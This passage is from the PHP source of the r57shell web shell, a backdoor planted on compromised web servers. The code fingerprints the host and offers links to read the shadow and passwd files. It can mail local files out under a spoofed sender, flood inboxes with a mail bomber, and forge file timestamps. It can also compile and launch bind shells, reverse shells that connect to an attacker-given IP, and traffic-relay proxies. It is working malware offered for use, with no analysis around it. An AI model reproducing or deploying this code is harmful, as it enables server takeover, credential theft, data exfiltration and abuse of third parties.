3981
3982VfcG9ydCwgJG1ldGhvZCk7CiRmaXJzdCA9IDxTRVNTSU9OPjsKJHVybCA9ICgkZmlyc3QgPX4gbXwoaHR0cDovL1xTKyl8KVswXTsKKCRtZXRob2QsI
3983
3984CRyZW1vdGVfaG9zdCwgJHJlbW90ZV9wb3J0KSA9IAooJGZpcnN0ID1+IG0hKEdFVCkgaHR0cDovLyhbXi86XSspOj8oXGQqKSEgKTsKaWYgKCEkcmVt
3985
3986b3RlX2hvc3QpIHsKY2xvc2UoU0VTU0lPTik7CmV4aXQ7Cn0KJHJlbW90ZV9wb3J0ID0gImh0dHAiIHVubGVzcyAoJHJlbW90ZV9wb3J0KTsKJGZpcnN
3987
39880ID1+IHMvaHR0cDpcL1wvW15cL10rLy87CnJldHVybiAoJGZpcnN0LCAkbWV0aG9kLCAkcmVtb3RlX2hvc3QsICRyZW1vdGVfcG9ydCk7Cn0Kc3ViIG
3989
39909wZW5fY29ubmVjdGlvbiB7Cm15ICgkaG9zdCwgJHBvcnQpID0gQF9bMSwyXTsKbXkgKCRkZXN0X2FkZHIsICRjdXIpOwppZiAoJHBvcnQgIX4gL15cZ
3991
3992CskLykgewokcG9ydCA9IChnZXRzZXJ2YnluYW1lKCRwb3J0LCAidGNwIikpWzJdOwokcG9ydCA9IDgwIHVubGVzcyAoJHBvcnQpOwp9CiRob3N0ID0g
3993
3994aW5ldF9hdG9uICgkaG9zdCkgb3IgcmV0dXJuIDA7CiRkZXN0X2FkZHIgPSBzb2NrYWRkcl9pbiAoJHBvcnQsICRob3N0KTsKc29ja2V0ICgkX1swXSw
3995
3996gQUZfSU5FVCwgU09DS19TVFJFQU0sICRwcm90b2NvbCkgb3IgZGllICJzb2NrZXQoKSA6ICQhIjsKY29ubmVjdCAoJF9bMF0sICRkZXN0X2FkZHIpIG
3997
39989yIHJldHVybiAwOwokY3VyID0gc2VsZWN0KCRfWzBdKTsgIAokfCA9IDE7CnNlbGVjdCgkY3VyKTsKcmV0dXJuIDE7Cn0=";
3999
4000if($unix)
4001
4002 {
4003
4004 if(!isset($_COOKIE['uname'])) { $uname = ex('uname -a'); setcookie('uname',$uname); } else { $uname = $_COOKIE['uname']; }
4005
4006 if(!isset($_COOKIE['id'])) { $id = ex('id'); setcookie('id',$id); } else { $id = $_COOKIE['id']; }
4007
4008 if($safe_mode) { $sysctl = '-'; }
4009
4010 else if(isset($_COOKIE['sysctl'])) { $sysctl = $_COOKIE['sysctl']; }
4011
4012 else
4013
4014 {
4015
4016 $sysctl = ex('sysctl -n kern.ostype && sysctl -n kern.osrelease');
4017
4018 if(empty($sysctl)) { $sysctl = ex('sysctl -n kernel.ostype && sysctl -n kernel.osrelease'); }
4019
4020 if(empty($sysctl)) { $sysctl = '-'; }
4021
4022 setcookie('sysctl',$sysctl);
4023
4024 }
4025
4026 }
4027
4028
4029
4030if(!isset($_COOKIE[$lang[$language.'_text137']])) {
4031
4032 $ust_u='';
4033
4034 if($unix && !$safe_mode){
4035
4036 foreach ($userful as $item) {
4037
4038 if(which($item)){$ust_u.=$item;}
4039
4040 }
4041
4042 }
4043
4044 if (@function_exists('apache_get_modules') && @in_array('mod_perl',apache_get_modules())) {$ust_u.=", mod_perl";}
4045
4046 if (@function_exists('apache_get_modules') && @in_array('mod_include',apache_get_modules())) {$ust_u.=", mod_include(SSI)";}
4047
4048 if (@function_exists('pcntl_exec')) {$ust_u.=", pcntl_exec";}
4049
4050 if (@extension_loaded('win32std')) {$ust_u.=", win32std_loaded";}
4051
4052 if (@extension_loaded('win32service')) {$ust_u.=", win32service_loaded";}
4053
4054 if (@extension_loaded('ffi')) {$ust_u.=", ffi_loaded";}
4055
4056 if (@extension_loaded('perl')) {$ust_u.=", perl_loaded";}
4057
4058 if(substr($ust_u,0,1)==",") {$ust_u[0]="";}
4059
4060
4061
4062 $ust_u = trim($ust_u);
4063
4064 setcookie($lang[$language.'_text137'],$ust_u);
4065
4066}else {
4067
4068 $ust_u = trim($_COOKIE[$lang[$language.'_text137']]);
4069
4070}
4071
4072
4073
4074if(!isset($_COOKIE[$lang[$language.'_text138']])) {
4075
4076 $ust_d='';
4077
4078 if($unix && !$safe_mode){
4079
4080 foreach ($danger as $item) {
4081
4082 if(which($item)){$ust_d.=$item;}
4083
4084 }
4085
4086 }
4087
4088 if(!$safe_mode){
4089
4090 foreach ($danger as $item) {
4091
4092 if(ps($item)){$ust_d.=$item;}
4093
4094 }
4095
4096 }
4097
4098 if (@function_exists('apache_get_modules') && @in_array('mod_security',apache_get_modules())) {$ust_d.=", mod_security";}
4099
4100 if(substr($ust_d,0,1)==",") {$ust_d[0]="";}
4101
4102
4103
4104 $ust_d = trim($ust_d);
4105
4106 setcookie($lang[$language.'_text138'],$ust_d);
4107
4108}else {
4109
4110 $ust_d = trim($_COOKIE[$lang[$language.'_text138']]);
4111
4112}
4113
4114
4115
4116if(!isset($_COOKIE[$lang[$language.'_text142']])) {
4117
4118
4119
4120 $select_downloaders='<select size="1" name=with>';
4121
4122 if((!@function_exists('ini_get')) || (@ini_get('allow_url_fopen') && @function_exists('file'))){$select_downloaders .= "<option value=\"fopen\">fopen</option>";$downloader="fopen";}
4123
4124 if($unix && !$safe_mode){
4125
4126 foreach ($downloaders as $item) {
4127
4128 if(which($item)){$select_downloaders .= '<option value="'.$item.'">'.$item.'</option>';$downloader.=", $item";}
4129
4130 }
4131
4132 }
4133
4134 $select_downloaders .= '</select>';
4135
4136 if(substr($downloader,0,1)==",") {$downloader[0]="";}
4137
4138
4139
4140 $downloader=trim($downloader);
4141
4142 setcookie('select_downloaders',$select_downloaders);
4143
4144 setcookie('downloader',$downloader);
4145
4146}else {
4147
4148 $select_downloaders = $_COOKIE['select_downloaders'];
4149
4150 $downloader = trim($_COOKIE['downloader']);
4151
4152}
4153
4154
4155
4156
4157
4158echo $head;
4159
4160echo '</head>';
4161
4162
4163
4164echo '<body><table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc width=100><font face=Verdana size=2>'.
4165
4166ws(2).'<b>'.ws(2).'<center>r57shell<br>v.'.$version.'</b><br><p><b><font color="#FF0000" size="2">Edited By KingDefacer</font></b></p></center></font>'.
4167
4168$fs.'<font face=Verdana size=-2><center>'.$lang[$language.'_text143']."<b>".$tempdir."</b><br>".$select_tempdir.'<br>'.in('submit','submit',0,$lang[$language.'_butt6']).
4169
4170'</center></font>'.$fe.'</td>'.'<td bgcolor=#cccccc><font face=Verdana size=-2>';
4171
4172echo ws(2)."<b>".date ("d-m-Y H:i:s")."</b> Your IP: [<font color=blue>".gethostbyname($_SERVER["REMOTE_ADDR"])."</font>]";
4173
4174echo " X_FORWARDED_FOR:"; if(isset($_SERVER['HTTP_X_FORWARDED_FOR'])){echo "[<font color=red>".$_SERVER['HTTP_X_FORWARDED_FOR']."</font>]";}else{echo "[<font color=green><b>NONE</b></font>]";}
4175
4176echo " CLIENT_IP: ";if(isset($_SERVER['HTTP_CLIENT_IP'])){echo "[<font color=red>".$_SERVER['HTTP_CLIENT_IP']."</font>]";}else{echo "[<font color=green><b>NONE</b></font>]";}
4177
4178echo " Server IP: [<font color=blue>".gethostbyname($_SERVER["HTTP_HOST"])."</font>]";
4179
4180
4181
4182echo "<br>";
4183
4184
4185
4186echo ws(2)."PHP version: <b>".@phpversion()."</b>";
4187
4188$curl_on = @function_exists('curl_version');
4189
4190echo ws(2);
4191
4192echo "cURL: <b>".(($curl_on)?("<font color=red>ON</font>"):("<font color=green>OFF</font>"));
4193
4194echo "</b>".ws(2);
4195
4196echo "MySQL: <b>";
4197
4198$mysql_on = @function_exists('mysql_connect');
4199
4200if($mysql_on){
4201
4202echo "<font color=red>ON</font>"; } else { echo "<font color=green>OFF</font>"; }
4203
4204echo "</b>".ws(2);
4205
4206echo "MSSQL: <b>";
4207
4208$mssql_on = @function_exists('mssql_connect');
4209
4210if($mssql_on){echo "<font color=red>ON</font>";}else{echo "<font color=green>OFF</font>";}
4211
4212echo "</b>".ws(2);
4213
4214echo "PostgreSQL: <b>";
4215
4216$pg_on = @function_exists('pg_connect');
4217
4218if($pg_on){echo "<font color=red>ON</font>";}else{echo "<font color=green>OFF</font>";}
4219
4220echo "</b>".ws(2);
4221
4222echo "Oracle: <b>";
4223
4224$ora_on = @function_exists('ocilogon');
4225
4226if($ora_on){echo "<font color=red>ON</font>";}else{echo "<font color=green>OFF</font>";}
4227
4228echo "</b>".ws(2);
4229
4230echo "MySQLi: <b>";
4231
4232$mysqli_on = @function_exists('mysqli_connect');
4233
4234if($mysqli_on){echo "<font color=red>ON</font>";}else{echo "<font color=green>OFF</font>";}
4235
4236echo "</b>".ws(2);
4237
4238echo "mSQL: <b>";
4239
4240$msql_on = @function_exists('msql_connect');
4241
4242if($msql_on){echo "<font color=red>ON</font>";}else{echo "<font color=green>OFF</font>";}
4243
4244echo "</b>".ws(2);
4245
4246echo "SQLite: <b>";
4247
4248$sqlite_on = @function_exists('sqlite_open');
4249
4250if($sqlite_on){echo "<font color=red>ON</font>";}else{echo "<font color=green>OFF</font>";}
4251
4252echo "</b><br>".ws(2);
4253
4254
4255
4256echo "Safe_mode: <b>";
4257
4258echo (($safe_mode)?("<font color=red>ON</font>"):("<font color=green>OFF</font>"));
4259
4260echo "</b>".ws(2);
4261
4262echo "Open_basedir: <b>";
4263
4264if($open_basedir) { if (''==($df=@ini_get('open_basedir'))) {echo "<font color=red>ini_get disable!</font></b>";}else {echo "<font color=red>$df</font></b>";};}
4265
4266else {echo "<font color=green>NONE</font></b>";}
4267
4268echo ws(2)."Safe_exec_dir: <b>";
4269
4270if(@function_exists('ini_get')) { if (''==($df=@ini_get('safe_mode_exec_dir'))) {echo "<font color=red>NONE</font></b>";}else {echo "<font color=green>$df</font></b>";};}
4271
4272else {echo "<font color=red>ini_get disable!</font></b>";}
4273
4274echo ws(2)."Safe_gid: <b>";
4275
4276if(@function_exists('ini_get')) { if (@ini_get('safe_mode_gid')) {echo "<font color=green>ON</font></b>";}else {echo "<font color=red>OFF</font></b>";};}
4277
4278else {echo "<font color=red>ini_get disable!</font></b>";}
4279
4280echo ws(2)."Safe_include_dir: <b>";
4281
4282if(@function_exists('ini_get')) { if (''==($df=@ini_get('safe_mode_include_dir'))) {echo "<font color=red>NONE</font></b>";}else {echo "<font color=green>$df</font></b>";};}
4283
4284else {echo "<font color=red>ini_get disable!</font></b>";}
4285
4286echo ws(2)."Sql.safe_mode: <b>";
4287
4288if(@function_exists('ini_get')) { if (@ini_get('sql.safe_mode')) {echo "<font color=red>ON</font></b>";}else {echo "<font color=green>OFF</font></b>";};}
4289
4290else {echo "<font color=red>ini_get disable!</font></b>";}
4291
4292
4293
4294echo "<br>".ws(2);
4295
4296echo "Disable functions : <b>";$df='ini_get disable!';
4297
4298if((@function_exists('ini_get')) && (''==($df=@ini_get('disable_functions')))){echo "<font color=green>NONE</font></b>";}else{echo "<font color=red>$df</font></b>";}
4299
4300
4301
4302if(@function_exists('diskfreespace')){$free = @diskfreespace($dir);}
4303
4304elseif(@function_exists('disk_free_space')){$free = @disk_free_space($dir);}else{$free = 'Unknown';}
4305
4306if (!$free) {$free = 0;}
4307
4308$all = @disk_total_space($dir);
4309
4310if (!$all) {$all = 0;}
4311
4312echo "<br>".ws(2)."Free space : <b>".view_size($free)."</b> Total space: <b>".view_size($all)."</b>";
4313
4314
4315
4316
4317
4318if($ust_u){echo "<br>".ws(2).$lang[$language.'_text137'].": <font color=blue>".$ust_u."</font>";};
4319
4320
4321
4322if($ust_d){echo "<br>".ws(2).$lang[$language.'_text138'].": <font color=red>".$ust_d."</font>";};
4323
4324
4325
4326if($downloader){echo "<br>".ws(2).$lang[$language.'_text142'].": <font color=blue>".$downloader."</font>";};
4327
4328
4329
4330
4331
4332echo "<br>".ws(2)."</b>";
4333
4334echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?1' title=\"".$lang[$language.'_text46']."\"><b>phpinfo</b></a> ".$rb;
4335
4336echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?2' title=\"".$lang[$language.'_text47']."\"><b>php.ini</b></a> ".$rb;
4337
4338echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?3' title=\"".$lang[$language.'_text50']."\"><b>cpu</b></a> ".$rb;
4339
4340echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?4' title=\"".$lang[$language.'_text51']."\"><b>mem</b></a> ".$rb;
4341
4342if(!$unix) {
4343
4344 echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?5' title=\"".$lang[$language.'_text50']."\"><b>systeminfo</b></a> ".$rb;
4345
4346}else{
4347
4348 echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?6' title=\"View syslog.conf\"><b>syslog</b></a> ".$rb;
4349
4350 echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?7' title=\"View resolv\"><b>resolv</b></a> ".$rb;
4351
4352 echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?8' title=\"View hosts\"><b>hosts</b></a> ".$rb;
4353
4354 echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?9' title=\"View shadow\"><b>shadow</b></a> ".$rb;
4355
4356 echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?10' title=\"".$lang[$language.'_text95']."\"><b>passwd</b></a> ".$rb;
4357
4358}
4359
4360echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?11' title=\"".$lang[$language.'_text48']."\"><b>tmp</b></a> ".$rb;
4361
4362echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?12' title=\"".$lang[$language.'_text49']."\"><b>delete</b></a> ".$rb;
4363
4364
4365
4366if($unix && !$safe_mode)
4367
4368{
4369
4370 echo "<br>".ws(2)."</b>";
4371
4372 echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?13' title=\"View procinfo\"><b>procinfo</b></a> ".$rb;
4373
4374 echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?14' title=\"View proc version\"><b>version</b></a> ".$rb;
4375
4376 echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?15' title=\"View mem free\"><b>free</b></a> ".$rb;
4377
4378 echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?16' title=\"View dmesg\"><b>dmesg</b></a> ".$rb;
4379
4380 echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?17' title=\"View vmstat\"><b>vmstat</b></a> ".$rb;
4381
4382 echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?18' title=\"View lspci\"><b>lspci</b></a> ".$rb;
4383
4384 echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?19' title=\"View lsdev\"><b>lsdev</b></a> ".$rb;
4385
4386 echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?20' title=\"View interrupts\"><b>interrupts</b></a> ".$rb;
4387
4388 echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?21' title=\"View realise1\"><b>realise1</b></a> ".$rb;
4389
4390 echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?22' title=\"View realise2\"><b>realise2</b></a> ".$rb;
4391
4392 echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?23' title=\"View lsattr -va\"><b>lsattr</b></a> ".$rb;
4393
4394
4395
4396 echo "<br>".ws(2)."</b>";
4397
4398 echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?24' title=\"View w\"><b>w</b></a> ".$rb;
4399
4400 echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?25' title=\"View who\"><b>who</b></a> ".$rb;
4401
4402 echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?26' title=\"View uptime\"><b>uptime</b></a> ".$rb;
4403
4404 echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?27' title=\"View last -n 10\"><b>last</b></a> ".$rb;
4405
4406 echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?28' title=\"View ps -aux\"><b>ps aux</b></a> ".$rb;
4407
4408 echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?29' title=\"View service\"><b>service</b></a> ".$rb;
4409
4410 echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?30' title=\"View ifconfig\"><b>ifconfig</b></a> ".$rb;
4411
4412 echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?31' title=\"View netstat -a\"><b>netstat</b></a> ".$rb;
4413
4414 echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?32' title=\"View fstab\"><b>fstab</b></a> ".$rb;
4415
4416 echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?33' title=\"View fdisk -l\"><b>fdisk</b></a> ".$rb;
4417
4418 echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?34' title=\"View df -h\"><b>df -h</b></a> ".$rb;
4419
4420}
4421
4422
4423
4424echo '</font></td></tr><table>
4425
4426<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000>
4427
4428<tr><td align=right width=100>';
4429
4430echo $font;
4431
4432
4433
4434if($unix){
4435
4436echo '<font color=blue><b>uname -a :'.ws(1).'<br>sysctl :'.ws(1).'<br>$OSTYPE :'.ws(1).'<br>Server :'.ws(1).'<br>id :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>';
4437
4438echo "</td><td>";
4439
4440echo "<font face=Verdana size=-2 color=red><b>";
4441
4442echo((!empty($uname))?(ws(3).@substr($uname,0,120)."<br>"):(ws(3).@substr(@php_uname(),0,120)."<br>"));
4443
4444echo ws(3).$sysctl."<br>";
4445
4446echo ws(3).ex('echo $OSTYPE')."<br>";
4447
4448echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>";
4449
4450if(!empty($id)) { echo ws(3).$id."<br>"; }
4451
4452else if(@function_exists('posix_geteuid') && @function_exists('posix_getegid') && @function_exists('posix_getgrgid') && @function_exists('posix_getpwuid'))
4453
4454 {
4455
4456 $euserinfo = @posix_getpwuid(@posix_geteuid());
4457
4458 $egroupinfo = @posix_getgrgid(@posix_getegid());
4459
4460 echo ws(3).'uid='.$euserinfo['uid'].' ( '.$euserinfo['name'].' ) gid='.$egroupinfo['gid'].' ( '.$egroupinfo['name'].' )<br>';
4461
4462 }
4463
4464else echo ws(3)."user=".@get_current_user()." uid=".@getmyuid()." gid=".@getmygid()."<br>";
4465
4466echo ws(3).$dir;
4467
4468echo ws(3).'( '.perms(@fileperms($dir)).' )';
4469
4470echo "</b></font>";
4471
4472}
4473
4474else
4475
4476{
4477
4478echo '<font color=blue><b>OS :'.ws(1).'<br>Server :'.ws(1).'<br>User :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>';
4479
4480echo "</td><td>";
4481
4482echo "<font face=Verdana size=-2 color=red><b>";
4483
4484echo ws(3).@substr(@php_uname(),0,120)."<br>";
4485
4486echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>";
4487
4488echo ws(3).@getenv("USERNAME")."<br>";
4489
4490echo ws(3).$dir;
4491
4492echo "<br></font>";
4493
4494}
4495
4496echo "</font>";
4497
4498echo "</td></tr></table>";
4499
4500
4501
4502if(!empty($_POST['cmd']) && $_POST['cmd']=="mail")
4503
4504 {
4505
4506 $res = mail($_POST['to'],$_POST['subj'],$_POST['text'],"From: ".$_POST['from']."\r\n");
4507
4508 err(6+$res);
4509
4510 $_POST['cmd']="";
4511
4512 }
4513
4514if(!empty($_POST['cmd']) && $_POST['cmd']=="mail_file" && !empty($_POST['loc_file']))
4515
4516 {
4517
4518 if($file=moreread($_POST['loc_file'])){ $filedump = $file; }
4519
4520 else if ($file=readzlib($_POST['loc_file'])) { $filedump = $file; } else { err(1,$_POST['loc_file']); $_POST['cmd']=""; }
4521
4522 if(!empty($_POST['cmd']))
4523
4524 {
4525
4526 $filename = @basename($_POST['loc_file']);
4527
4528 $content_encoding=$mime_type='';
4529
4530 compress($filename,$filedump,$_POST['compress']);
4531
4532 $attach = array(
4533
4534 "name"=>$filename,
4535
4536 "type"=>$mime_type,
4537
4538 "content"=>$filedump
4539
4540 );
4541
4542 if(empty($_POST['subj'])) { $_POST['subj'] = 'file from r57shell'; }
4543
4544 if(empty($_POST['from'])) { $_POST['from'] = 'billy@microsoft.com'; }
4545
4546 $res = mailattach($_POST['to'],$_POST['from'],$_POST['subj'],$attach);
4547
4548 err(6+$res);
4549
4550 $_POST['cmd']="";
4551
4552 }
4553
4554 }
4555
4556if(!empty($_POST['cmd']) && $_POST['cmd']=="mail_bomber" && !empty($_POST['mail_flood']) && !empty($_POST['mail_size']))
4557
4558 {
4559
4560 for($h=1;$h<=$_POST['mail_flood'];$h++){
4561
4562 $res = mail($_POST['to'],$_POST['subj'],$_POST['text'].str_repeat(" ", 1024*$_POST['mail_size']),"From: ".$_POST['from']."\r\n");
4563
4564 }
4565
4566 err(6+$res);
4567
4568 $_POST['cmd']="";
4569
4570 }
4571
4572if(!empty($_POST['cmd']) && $_POST['cmd'] == "find_text")
4573
4574{
4575
4576$_POST['cmd'] = 'find '.$_POST['s_dir'].' -name \''.$_POST['s_mask'].'\' | xargs grep -E \''.$_POST['s_text'].'\'';
4577
4578}
4579
4580if(!empty($_POST['cmd']) && $_POST['cmd']=="ch_")
4581
4582 {
4583
4584 switch($_POST['what'])
4585
4586 {
4587
4588 case 'own':
4589
4590 @chown($_POST['param1'],$_POST['param2']);
4591
4592 break;
4593
4594 case 'grp':
4595
4596 @chgrp($_POST['param1'],$_POST['param2']);
4597
4598 break;
4599
4600 case 'mod':
4601
4602 @chmod($_POST['param1'],intval($_POST['param2'], 8));
4603
4604 break;
4605
4606 }
4607
4608 $_POST['cmd']="";
4609
4610 }
4611
4612if(!empty($_POST['cmd']) && $_POST['cmd']=="mk")
4613
4614 {
4615
4616 switch($_POST['what'])
4617
4618 {
4619
4620 case 'file':
4621
4622 if($_POST['action'] == "create")
4623
4624 {
4625
4626 if(@file_exists($_POST['mk_name']) || !morewrite($_POST['mk_name'],'your text here')) { err(2,$_POST['mk_name']); $_POST['cmd']=""; }
4627
4628 else {
4629
4630 $_POST['e_name'] = $_POST['mk_name'];
4631
4632 $_POST['cmd']="edit_file";
4633
4634 echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text61']."</b></font></div></td></tr></table>";
4635
4636 }
4637
4638 }
4639
4640 else if($_POST['action'] == "delete")
4641
4642 {
4643
4644 if(@unlink($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text63']."</b></font></div></td></tr></table>";
4645
4646 $_POST['cmd']="";
4647
4648 }
4649
4650 break;
4651
4652 case 'dir':
4653
4654 if($_POST['action'] == "create"){
4655
4656 if(@mkdir($_POST['mk_name']))
4657
4658 {
4659
4660 $_POST['cmd']="";
4661
4662 echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text62']."</b></font></div></td></tr></table>";
4663
4664 }
4665
4666 else { err(2,$_POST['mk_name']); $_POST['cmd']=""; }
4667
4668 }
4669
4670 else if($_POST['action'] == "delete"){
4671
4672 if(@rmdir($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text64']."</b></font></div></td></tr></table>";
4673
4674 $_POST['cmd']="";
4675
4676 }
4677
4678 break;
4679
4680 }
4681
4682 }
4683
4684
4685
4686
4687
4688if(!empty($_POST['cmd']) && $_POST['cmd']=="touch")
4689
4690{
4691
4692if(!$_POST['file_name_r'])
4693
4694 {
4695
4696 $datar = $_POST['day']." ".$_POST['month']." ".$_POST['year']." ".$_POST['chasi']." hours ".$_POST['minutes']." minutes ".$_POST['second']." seconds";
4697
4698 $datar = @strtotime($datar);
4699
4700 @touch($_POST['file_name'],$datar,$datar);}
4701
4702else{
4703
4704 @touch($_POST['file_name'],@filemtime($_POST['file_name_r']),@filemtime($_POST['file_name_r']));
4705
4706}
4707
4708$_POST['cmd']="";
4709
4710}
4711
4712
4713
4714
4715
4716if(!empty($_POST['cmd']) && $_POST['cmd']=="edit_file" && !empty($_POST['e_name']))
4717
4718 {
4719
4720 if(@is_dir($_POST['e_name'])){ err(1,$_POST['e_name']); $_POST['cmd']=""; }
4721
4722 elseif($file=moreread($_POST['e_name'])) { $filedump = $file; if(!@is_writable($_POST['e_name'])) { $only_read = 1; }; }
4723
4724 elseif($file=readzlib($_POST['e_name'])) { $filedump = $file; $only_read = 1; }
4725
4726 elseif(@file_exists($_POST['e_name'])) {$filedump = 'NONE'; if(!@is_writable($_POST['e_name'])) { $only_read = 1; };}
4727
4728 else { err(1,$_POST['e_name']); $_POST['cmd']=""; }
4729
4730 if(!empty($_POST['cmd']))
4731
4732 {
4733
4734 echo $table_up3;
4735
4736 echo $font;
4737
4738 echo "<form name=save_file method=post>";
4739
4740 echo ws(3)."<b>".$_POST['e_name']."</b>";
4741
4742 echo "<div align=center><textarea name=e_text cols=121 rows=24>";
4743
4744 echo @htmlspecialchars($filedump);
4745
4746 echo "</textarea>";
4747
4748 echo "<input type=hidden name=e_name value='".$_POST['e_name']."'>";
4749
4750 echo "<input type=hidden name=dir value='".$dir."'>";
4751
4752 echo "<input type=hidden name=cmd value=save_file>";
4753
4754 echo (!empty($only_read)?("<br><br>".$lang[$language.'_text44']):("<br><br><input type=submit name=submit value=\" ".$lang[$language.'_butt10']." \">"));
4755
4756 echo "</div>";
4757
4758 echo "</font>";
4759
4760 echo "</form>";
4761
4762 echo "</td></tr></table>";
4763
4764 exit();
4765
4766 }
4767
4768 }
4769
4770if(!empty($_POST['cmd']) && $_POST['cmd']=="save_file")
4771
4772 {
4773
4774 $mtime = @filemtime($_POST['e_name']);
4775
4776 if(!@is_writable($_POST['e_name'])) { err(0,$_POST['e_name']); }
4777
4778 else {
4779
4780 if($unix) $_POST['e_text']=@str_replace("\r\n","\n",$_POST['e_text']);
4781
4782 morewrite($_POST['e_name'],$_POST['e_text']);
4783
4784 $_POST['cmd']="";
4785
4786 echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text45']."</b></font></div></td></tr></table>";
4787
4788 }
4789
4790 @touch($_POST['e_name'],$mtime,$mtime);
4791
4792 }
4793
4794
4795
4796
4797
4798if (!empty($_POST['proxy_port'])&&($_POST['use']=="Perl"))
4799
4800{
4801
4802 cf($tempdir.'prxpl',$prx_pl);
4803
4804 $p2=which("perl");
4805
4806 $blah = ex($p2.' '.$tempdir.'prxpl '.$_POST['proxy_port'].' &');
4807
4808 @unlink($tempdir.'prxpl');
4809
4810 $_POST['cmd']="ps -aux | grep prxpl";
4811
4812}
4813
4814if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="C"))
4815
4816{
4817
4818 cf($tempdir.'bd.c',$port_bind_bd_c);
4819
4820 $blah = ex('gcc -o '.$tempdir.'bd '.$tempdir.'bd.c');
4821
4822 @unlink($tempdir.'bd.c');
4823
4824 $blah = ex($tempdir.'bd '.$_POST['port'].' '.$_POST['bind_pass'].' &');
4825
4826 @unlink($tempdir.'bd');
4827
4828 $_POST['cmd']="ps -aux | grep bd";
4829
4830}
4831
4832if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="Perl"))
4833
4834{
4835
4836 cf($tempdir.'bdpl',$port_bind_bd_pl);
4837
4838 $p2=which("perl");
4839
4840 $blah = ex($p2.' '.$tempdir.'bdpl '.$_POST['port'].' &');
4841
4842 @unlink($tempdir.'bdpl');
4843
4844 $_POST['cmd']="ps -aux | grep bdpl";
4845
4846}
4847
4848if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="Perl"))
4849
4850{
4851
4852 cf($tempdir.'back',$back_connect);
4853
4854 $p2=which("perl");
4855
4856 $blah = ex($p2.' '.$tempdir.'back '.$_POST['ip'].' '.$_POST['port'].' &');
4857
4858 @unlink($tempdir.'back');
4859
4860 $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\"";
4861
4862}
4863
4864if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="C"))
4865
4866{
4867
4868 cf($tempdir.'back.c',$back_connect_c);
4869
4870 $blah = ex('gcc -o '.$tempdir.'backc '.$tempdir.'back.c');
4871
4872 @unlink($tempdir.'back.c');
4873
4874 $blah = ex($tempdir.'backc '.$_POST['ip'].' '.$_POST['port'].' &');
4875
4876 @unlink($tempdir.'back');
4877
4878 $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\"";
4879
4880}
4881
4882if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="Perl"))
4883
4884{
4885
4886 cf($tempdir.'dp',$datapipe_pl);
4887
4888 $p2=which("perl");
4889
4890 $blah = ex($p2.' '.$tempdir.'dp '.$_POST['local_port'].' '.$_POST['remote_host'].' '.$_POST['remote_port'].' &');
4891
4892 @unlink($tempdir.'dp');
4893
4894 $_POST['cmd']="ps -aux | grep dp";
4895
4896}
4897
4898if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="C"))
4899
4900{
4901
4902 cf($tempdir.'dpc.c',$datapipe_c);
4903
